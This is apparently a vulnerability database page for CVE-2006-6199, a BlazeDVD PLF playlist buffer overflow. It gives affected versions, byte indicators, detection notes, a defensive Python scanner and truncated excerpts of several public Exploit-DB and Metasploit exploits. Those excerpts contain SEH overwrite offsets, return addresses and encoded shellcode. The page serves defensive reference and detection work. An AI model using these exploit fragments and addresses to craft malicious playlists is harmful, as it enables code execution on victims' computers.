CVE-2006-6199
Published: 2006-12-01
Priority: P3 · 57 · high · CVSS 2.0 score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
EXPLOIT
EPSS: 65.06% (99.2th percentile)
Stack-based buffer overflow in BlazeVideo BlazeDVD Standard and Professional 5.0, and possibly earlier, allows remote attackers to execute arbitrary code via a long filename in a PLF playlist.
Affected (3 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| blazevideo | blaze_dvd | — | — |
| blazevideo | hdtv_player | <= 2.1 | — |
| blazevideo | hdtv_player | — | — |
Detection & IOCs (extracted from sources)
Byte indicators:
- \xEB\x06\x90\x90 (short jump / NOP sled SEH overwrite pattern)
- \xb8\x15\xd1\x72 (SEH handler overwrite address)
- \x41 x 608 (junk buffer padding before SEH overwrite)
- 0x100101e7 (return address for BlazeDVD 5.1 Metasploit target)
- 5e 59 c3 (pop esi / pop ecx / ret gadget at 0x100012cd in skinscrollbar)
- \xae\x74\x60\x61 (SEH overwrite: ADD ESP,408 # RETN 4 at 0x616074AE)
- \x78\x53\xbe\x01 (return address used in BlazeDVD 5.0 PLF exploit)
Detection notes:
- Malicious .PLF playlist files trigger a stack-based buffer overflow in BlazeDVD when opened; detect creation or download of .PLF files containing large repetitive byte sequences (e.g., 600+ bytes of 0x41) followed by SEH overwrite patterns.
- SEH-based exploitation: look for .PLF files where bytes at offset ~608 contain a short-jump stub (\xEB\x06\x90\x90) immediately followed by a 4-byte return address overwrite.
- Metasploit module targets BlazeDVD 5.1 with a 6024-byte alphanumeric-upper encoded payload; SEH control occurs at offset 868/872 within the PLF file buffer.
- The ASLR/DEP bypass exploit for Windows 7 uses ROP gadgets exclusively from non-ASLR modules loaded by BlazeDVD (base addresses 0x61xxxxxx, 0x64xxxxxx, 0x60xxxxxx); presence of these address ranges in a PLF file is a strong indicator of exploitation.
- The skinscrollbar DLL loaded by BlazeDVD 5.1 contains a pop/pop/ret gadget at 0x100012cd; flag memory searches or ROP chains referencing this address range (0x10000000–0x10018000).
- The Metasploit module uses the AlphanumUpper encoder with a null-byte bad character restriction; payloads containing \x00 will not function correctly.
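As an added defensive example (written for this page, not code from any of the listed sources), the following Python scanner applies the detection notes above to the raw bytes of a .PLF file: it measures the longest run of one repeated byte, looks for a 600+ byte padding run immediately followed by one of the short-jump stubs listed on the page and a 4-byte handler address, and then walks the dwords after the stub for values inside the non-ASLR module ranges. The exact range bounds, the function names and both sample playlists are assumptions constructed here; the crafted sample only reuses addresses already listed in the indicators and carries no payload.

```python
"""Heuristic scanner for crafted .PLF playlists (added example, not from the page's sources)."""
import struct

# Indicators listed on the page: short-jump stubs that overwrite nSEH, and the
# minimum size of the junk padding that precedes the SEH overwrite.
SHORT_JUMP_STUBS = (b"\xEB\x06\x90\x90", b"\xEB\x08\x90\x90")
MIN_PAD_RUN = 600

# Address ranges the page associates with non-ASLR modules loaded by BlazeDVD.
# Bounds are assumptions derived from the page's 0x10000000-0x10018000 range and
# its 0x60xxxxxx / 0x61xxxxxx / 0x64xxxxxx prefixes; half-open [lo, hi).
SUSPICIOUS_RANGES = (
    (0x10000000, 0x10018000),  # skinscrollbar DLL (pop/pop/ret at 0x100012cd)
    (0x60000000, 0x62000000),  # 0x60xxxxxx and 0x61xxxxxx modules
    (0x64000000, 0x65000000),  # 0x64xxxxxx modules
)


def longest_byte_run(data: bytes):
    """Return (byte_value, run_length, start_offset) for the longest run of one repeated byte."""
    best = (None, 0, -1)
    i, n = 0, len(data)
    while i < n:
        j = i
        while j < n and data[j] == data[i]:
            j += 1
        if j - i > best[1]:
            best = (data[i], j - i, i)
        i = j
    return best


def find_seh_overwrite(data: bytes):
    """Locate a long padding run immediately followed by a short-jump stub and a
    4-byte handler address. Returns a dict describing the hit, or None."""
    for stub in SHORT_JUMP_STUBS:
        pos = data.find(stub)
        while pos != -1:
            if pos > 0 and pos + 8 <= len(data):
                pad_byte = data[pos - 1]
                start = pos
                while start > 0 and data[start - 1] == pad_byte:
                    start -= 1
                if pos - start >= MIN_PAD_RUN:
                    handler = struct.unpack("<I", data[pos + 4:pos + 8])[0]
                    return {"pad_byte": pad_byte, "pad_len": pos - start,
                            "stub_offset": pos, "seh_handler": handler}
            pos = data.find(stub, pos + 1)
    return None


def rop_candidates(data: bytes, start: int):
    """Walk dword-aligned values from `start` and return those inside the
    non-ASLR module ranges; a run of such values after the SEH overwrite is the
    ROP-chain indicator the page describes."""
    hits = []
    for off in range(start, len(data) - 3, 4):
        val = struct.unpack("<I", data[off:off + 4])[0]
        if any(lo <= val < hi for lo, hi in SUSPICIOUS_RANGES):
            hits.append(val)
    return hits


def scan_plf(data: bytes):
    """Combine the heuristics into a verdict for one playlist's bytes."""
    byte, run_len, run_off = longest_byte_run(data)
    seh = find_seh_overwrite(data)
    chain = rop_candidates(data, seh["stub_offset"] + 4) if seh else []
    suspicious = seh is not None or run_len >= MIN_PAD_RUN
    return {"verdict": "suspicious" if suspicious else "clean",
            "longest_run": {"byte": byte, "length": run_len, "offset": run_off},
            "seh": seh, "rop_candidates": chain}


# Constructed samples: a plain text playlist, and a file laid out like the page's
# IOCs (608 bytes of 0x41, short-jump stub, handler 0x616074AE, gadget 0x100012CD)
# with NOPs in place of any payload.
BENIGN_PLF = b"C:\\Videos\\intro.mpg\r\nC:\\Videos\\feature.vob\r\n"
CRAFTED_PLF = (b"\x41" * 608 + b"\xEB\x06\x90\x90"
               + struct.pack("<I", 0x616074AE) + struct.pack("<I", 0x100012CD)
               + b"\x90" * 16)

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_PLF), ("crafted", CRAFTED_PLF)):
        result = scan_plf(sample)
        print(name, result["verdict"], [hex(a) for a in result["rop_candidates"]])
```

The address walk starts at the handler dword and steps by four so that ordinary playlist text, where a byte such as 0x61 ('a') could otherwise make any unaligned 4-byte window look like a 0x61xxxxxx address, is not flagged on its own; the long padding run and the stub remain the primary trigger.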
GHSA
GHSA-hg5p-p4fc-5gx2 (ghsa_unreviewed · 2022-05-01): CVE-2006-6199 [HIGH] CWE-119
Stack-based buffer overflow in BlazeVideo BlazeDVD Standard and Professional 5.0, and possibly earlier, allows remote attackers to execute arbitrary code via a long filename in a PLF playlist.
GHSA
GHSA-3g98-7fv9-8r7r (ghsa_unreviewed · 2022-05-01 · CVSS 7.5): CVE-2006-6396 [HIGH] CWE-119
Stack-based buffer overflow in BlazeVideo HDTV Player 2.1, and possibly earlier, allows remote attackers to execute arbitrary code via a long filename in a PLF playlist, a different product than CVE-2006-6199. NOTE: it was later reported that 3.5 is also affected.
No detection rules found.
Exploit-DB
BlazeDVD 6.2 - '.plf' Local Buffer Overflow (SEH) (exploitdb · 2013-10-28 · CVE-2006-6199)
---
#!/usr/bin/perl
#########################################################################################
# Exploit Title: BlazeDVD 6.2 .plf Buffer Overflow (SEH)
# Date: 10-28-2013
# Exploit Author: Mike Czumak (T_v3rn1x) -- @SecuritySift
# Vulnerable Software: BlazeDVD 6.2
# Software Link:
# Version: 6.2.0.0
# Tested On: Windows XP SP3
# To exploit, simply open blazesploit.plf file
#########################################################################################
my $buffsize = 10000; # sets buffer size for consistent sized payload
my $junk = "\x41" x 868; # nseh is at offset 868, followed by 2864 bytes of available data
my $nseh = "\xeb\x08\x90\x90"; # overwrite next seh with jmp instruction (8 bytes)
my $seh = pack('V',0x
Exploit-DB
BlazeDVD Pro Player 6.1 - Direct RET Local Stack Buffer Overflow (exploitdb · 2013-07-16 · CVE-2006-6199)
---
#!/usr/bin/perl
# BlazeDVD Pro player 6.1 Local stack based buffer overflow
# Author: PuN1sh3r
# Email: [email protected]
# Date: Mon Jul 15 03:01:37 EDT 2013
# Vendor link: http://www.blazevideo.com/download.htmm
# Software Link: http://www.blazevideo.com/download.php?product=BlazeDVDPro
# App Version: 6.1
# Tested on: Windows 2003 server sp1(EN)
# special thanks to corelanc0d3r for his amazing tutorials
$file = "blazeExpl.plf";
$junk = "\x41" x 260;
$eip = "\x33\xFE\xE4\x77"; #jmp ESP on kernel32.dll
#msf win/exec calc.exe [*] x86/alpha_mixed
$shellcode = "\x89\xe7\xda\xd4\xd9\x77\xf4\x5b\x53\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x
Exploit-DB
BlazeDVD 6.1 - '.PLF' File (ASLR + DEP Bypass) (Metasploit) (exploitdb · 2012-12-31 · CVE-2006-6199)
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'BlazeDVD 6.1 PLF Exploit DEP/ASLR Bypass',
'Description' => %q{
This module updates an existing MSF module originally written for BlazeDVD 5.1. The new module
will bypass DEP and ASLR on version 6. The original vulnerability is due to the handling of
specially crafted PLF files. Exploiting this allows us to execute arbitrary code running under
the context of the user.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Gjoko Krstic', # Origin
Exploit-DB
BlazeDVD 5.1 - PLF Buffer Overflow (Metasploit) (exploitdb · 2010-11-11 · CVE-2006-6199)
---
##
# $Id: blazedvd_plf.rb 10998 2010-11-11 22:43:22Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'BlazeDVD 5.1 PLF Buffer Overflow',
'Description' => %q{
This module exploits a stack over flow in BlazeDVD 5.1. When
the application is used to open a specially crafted plf file,
a buffer is overwritten allowing for the execution of arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'MC' ],
'Version' => '$Revision: 10998 $',
'References' =>
[
[ 'CVE' , '2006-6199' ],
[ 'OSVD
Exploit-DB
BlazeDVD 5.1 (Windows 7) - '.plf' File Stack Buffer Overflow (ASLR + DEP Bypass) (exploitdb · 2010-06-17 · CVE-2006-6199)
---
#!/usr/bin/python
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# BlazeDVD v5.1 (.plf) Stack Buffer Overflow PoC exploit - ALSR/DEP bypass on win7
# Author: mr_me - https://net-ninja.net - mr_me[AT]corelan.be - @StevenSeeley
# Download: http://www.blazevideo.com/
# Tested on windows 7 version N - DEP = AlwaysOn
# Greetz: Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
# Greetz to ryujin ! :P
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# This PoC demonstates how we can bypass ASLR by stealing a
# pointer off the stack and calculating the offset.
# Then setup the VirtualProtect() call and execute it to bypass DE
Exploit-DB
BlazeDVD 5.1/HDTV Player 6.0 - '.plf' Universal Buffer Overflow (SEH) (exploitdb · 2009-08-04 · CVE-2009-0450)
---
#!/usr/bin/perl
# by ThE g0bL!N
#THNX: His0k4 Wahdo :)
#BlazeDVD 5.1 Professional/Blaze HDTV Player 6.0 /(.PLF File) Universal Buffer Overflow Exploit (SEH)
##################################################################
my $bof="\x41" x 608;
my $nsh="\xEB\x06\x90\x90";
my $seh="\x71\xFB\x32\x60" ;# Universal Address
my $nop="\x90" x 20;
my $sec=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
"\x4f\x55\x42\x52\x41\x3
Exploit-DB
BlazeDVD 5.1 Professional - '.plf' Local Buffer Overflow (SEH) (exploitdb · 2009-08-03 · CVE-2006-6199)
---
#!/usr/bin/perl
# by hack4love
# [email protected]
# BlazeDVD 5.1 Professional (.PLF File) Local Buffer Overflow Exploit (SEH)
# ## easy ##
###Thanks for SkuLL-HacKeR ####and all WwW.Sec-ArT.CoM/cc team
##AND special THANKS FOR EL7ADRANY ##AND 3ASFH TEAM##
## this work sooooooooo good
## Tested on: Windows XP Pro SP2 (EN)
##################################################################
my $bof="\x41" x 608;
my $nsh="\xEB\x06\x90\x90";
my $seh="\xb8\x15\xd1\x72";
my $nop="\x90" x 20;
my $sec=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x4
Exploit-DB
BlazeDVD 5.0 - '.PLF' Playlist File Remote Buffer Overflow (exploitdb · 2008-08-10 · CVE-2006-6199)
---
#!/usr/bin/perl
#
# Title: BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit (PoC)
#
# Summary: BlazeDVD is leading powerful and easy-to-use DVD player software.
# It can provide superior video and audio(Dolby) quality, together with other
# enhanced features:e.g. recording DVD,playback image and DV,bookmark and image
# capture.etc.Furthermore, besides DVD,Video CD,Audio CD, BlazeDVD supports DIVX,
# MPEG4, RM, QuickTime, WMV, WMV-HD, MacroMedia Flash and any other video file
# you have the codec installed for.The DVD player software can be extensive
# compatible with hardware,which is operated stable,smoothly under Windows98,
# 98SE, Me, 2000, XP, VISTA.
#
# Product web Page: http://www.blazevideo.com/dvd-player/
Exploit-DB
BlazeVideo HDTV Player 2.1 - '.PLF' Local Buffer Overflow (exploitdb · 2006-12-01 · CVE-2009-0450)
---
/*
0-day BlazeVideo HDTV Player
30 days of Media Player Exploits by Greg Linares
Discovered and Reported By: Greg Linares [email protected]
Reported Exploit Date: 12/1/2006
*/
#include
#include
#include
int main(int argc, char *argv[])
{
FILE *Exploit;
/* Executes Calc.exe Alpha2 Shellcode Provided by Expanders */
unsigned char scode[] =
"TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI"
"YlHhQTs0s0c0LKcuwLLK1ls52Xs1JONkRofxNkcoUpUQZKCylK4tLKuQxnTqo0LYnLMTkpptUWiQ9ZdM"
"5QO2JKZT5k2tUtUTPuKULKQOfDc1zKPfNkflrkNkSowlvaZKLK5LlKgqxkMYqL14wtYSFQkpcTNkQPtp"
"LEiPd8VlNkqPVllKPp7lNMLK0htHjKuYnkMPnP7pc05PLKsXUlsovQxvU0PVOy9hlCo0SKRpsXhoxNip"
"sPu8LX9nMZvnv79oM7sSU1rLsSdnu5rX3UuPA";
/* replace it with your own shellco
Metasploit
BlazeDVD 6.1 PLF Buffer Overflow (metasploit)
This module exploits a stack overflow in BlazeDVD 5.1 and 6.2. When the application is used to open a specially crafted plf file, a buffer is overwritten allowing for the execution of arbitrary code.
No writeups or analysis indexed.
References:
- http://secunia.com/advisories/23041
- http://whitestar.linuxbox.org/pipermail/exploits/2006-December/000065.html
- http://www.exploit-db.com/exploits/23783
- http://www.exploit-db.com/exploits/26889
- http://www.osvdb.org/30770
- http://www.securityfocus.com/bid/21337
- http://www.vupen.com/english/advisories/2006/4764
- https://exchange.xforce.ibmcloud.com/vulnerabilities/30567
- https://www.exploit-db.com/exploits/2880
Published: 2006-12-01